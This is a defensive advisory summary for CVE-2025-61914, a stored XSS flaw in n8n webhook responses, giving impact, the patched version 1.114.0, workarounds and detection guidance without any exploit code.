CVE-2025-61914
📋 TL;DR
This stored XSS vulnerability in n8n allows attackers with workflow creation permissions to execute arbitrary JavaScript in the n8n editor interface. The vulnerability occurs when the 'Respond to Webhook' node returns HTML containing executable scripts, bypassing the sandbox protection introduced in version 1.103.0. Organizations using n8n versions before 1.114.0 with workflow creation enabled are affected.
💻 Affected Systems
- n8n
📦 What is this software?
N8n by N8n
⚠️ Risk & Real-World Impact
Worst Case
An attacker with workflow creation permissions could execute malicious JavaScript to steal session tokens, perform actions as authenticated users, or compromise the entire n8n instance.
Likely Case
Malicious users with workflow creation privileges could inject scripts to steal credentials, manipulate workflows, or perform unauthorized actions within the n8n environment.
If Mitigated
With proper access controls and input validation, the impact is limited to users with workflow creation permissions who intentionally exploit the vulnerability.
🎯 Exploit Status
Exploitation requires workflow creation permissions. The vulnerability is straightforward to exploit once an attacker has the necessary privileges.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.114.0
Vendor Advisory: https://github.com/n8n-io/n8n/security/advisories/GHSA-58jc-rcg5-95f3
Restart Required: Yes
Instructions:
1. Backup your n8n instance and data. 2. Update n8n to version 1.114.0 or later using your package manager or deployment method. 3. Restart the n8n service. 4. Verify the update was successful.
🔧 Temporary Workarounds
Restrict workflow creation permissions
allLimit workflow creation and modification to trusted administrators only
Implement HTML sanitization
allUse external reverse proxy or HTML sanitizer to filter executable scripts from webhook responses
🧯 If You Can't Patch
- Immediately restrict workflow creation permissions to minimal trusted users only
- Implement network segmentation to isolate n8n instances and monitor for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Check n8n version. If version is below 1.114.0 and workflow creation is enabled, the system is vulnerable.Check Version:
n8n --versionVerify Fix Applied:
Verify n8n version is 1.114.0 or higher and test that HTML responses in 'Respond to Webhook' nodes are properly sandboxed.📡 Detection & Monitoring
Log Indicators:
- Unusual workflow creation/modification activity
- Suspicious HTML content in webhook responses
- Multiple failed authentication attempts followed by workflow changes
Network Indicators:
- Unexpected outbound connections from n8n instance
- Suspicious payloads in webhook responses
SIEM Query:
source="n8n" AND (event="workflow_created" OR event="workflow_updated") AND user NOT IN ["trusted_admin_list"]